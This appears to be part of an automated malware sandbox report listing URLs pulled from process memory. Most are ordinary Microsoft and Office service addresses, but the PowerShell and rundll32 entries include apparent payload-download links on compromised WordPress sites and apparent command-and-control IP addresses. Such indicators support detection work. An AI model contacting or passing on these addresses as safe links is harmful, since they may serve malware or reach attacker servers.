Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/.Split
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/9aTcv/.Split.Split
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/In
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/Tcv/.Splitplit0.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngp
Source: powershell.exe, 00000005.00000002.339588827.0000000004711000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.343021094.0000000004CAE000.00000004.00000001.sdmp	String found in binary or memory: http://thepilatesstudionj.co
Source: powershell.exe, 00000005.00000002.343390690.0000000004D5D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://thepilatesstudionj.com
Source: powershell.exe, 00000005.00000002.343856415.0000000004E23000.00000004.00000001.sdmp	String found in binary or memory: http://thepilatesstudionj.com/wp-conte
Source: powershell.exe, 00000005.00000002.343021094.0000000004CAE000.00000004.00000001.sdmp	String found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5
Source: powershell.exe, 00000005.00000002.343390690.0000000004D5D000.00000004.00000001.sdmp	String found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5U
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlp
Source: svchost.exe, 00000008.00000002.309740186.000001C419413000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: powershell.exe, 00000005.00000003.337043153.00000000078AD000.00000004.00000001.sdmp	String found in binary or memory: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCK
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14/563209-4053062332-1002
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14/W
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14/h
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://168.197.250.1480/
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://168.197.250.14:80/
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL2q
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL4053062332-1002
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHLz
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/y
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp, rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48/
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://45.79.33.48/a
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48/s
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/0
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/2
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://45.79.33.48:8080/a
Source: rundll32.exe, 00000015.00000002.535047185.0000000002FF0000.00000004.00000020.sdmp	String found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVo
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVoU
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVoryptography
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVou/
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/E
Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp, rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTN
Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTN3
Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTNa
Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTNh
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.aadrm.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.office.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://augloop.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cdn.entity.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cortana.ai
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cr.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://directory.services.
Source: svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000002.309911672.000001C41945E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000002.309911672.000001C41945E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000002.309921606.000001C419462000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.287038973.000001C419431000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pesterp
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000005.00000003.312830879.000000000517B000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://graph.windows.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://login.windows.local
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://management.azure.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://management.azure.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://officeapps.live.com
